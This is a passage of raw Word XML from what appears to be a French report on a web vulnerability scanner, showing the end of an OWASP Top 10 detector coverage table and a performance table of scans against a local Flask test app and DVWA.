          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4AED65DF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VulnerableComponentsDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1069F34E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4BA7C244" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="57D37C23" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ADCB1F6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FA42147" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Auth &amp; Session Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="369D84C0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AuthFailuresDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53FA7910" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B03474F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="133239F6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="674E2DC5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3D3EBD5A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Software &amp; Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2AF2F6EB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IntegrityDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="45F76B50" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3FDCC304" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="756777C4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08E64D1D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0629149A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Logging &amp; Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7107FADC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A2FBC7C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="745ED6E8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="C80000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non détectable (actif)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1D6907A4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1D6A9337" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1C9E65F2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="03B9BAE7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSRFDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0743D60F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5077C262" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6156D07B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="5A88D779" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La catégorie A09 (Logging &amp; Monitoring Failures) ne peut pas être évaluée par un scan actif : elle nécessite une inspection manuelle des journaux d'accès, des logs applicatifs et des configurations SIEM. Elle représente typiquement une phase d'audit manuel complémentaire au scan automatisé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF2029" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="1" w:color="003366"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="120"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.7  Analyse des Performances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541B19E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nous avons mesuré les performances de notre scanner sur trois cibles différentes afin d'évaluer l'impact de la profondeur de crawl et du nombre de détecteurs actifs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447C362" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Mesures de performance sur différentes cibles</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2656"/>
        <w:gridCol w:w="1065"/>
        <w:gridCol w:w="1377"/>
        <w:gridCol w:w="2102"/>
        <w:gridCol w:w="1076"/>
        <w:gridCol w:w="1062"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="190C6DB7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="201F36EF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="688B285E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D988B2B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Profondeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="201FD57A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Détecteurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="004D6F88" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Temps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35BC6F73" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="18F79F2A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD9CCAA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Flask test app (local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A8D5EAA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C756F7B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0042A5B8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tous (12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17DC23C4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6,04s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7354D837" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="194445D5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6EA1CA93" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Flask test app (local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4FE54BB5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2A964495" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="61D1DC32" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sqli,xss uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4AF962B9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1,8s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5C4D3703" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="64A67373" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B37CAC0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DVWA (VM, security=low)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566A27CD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
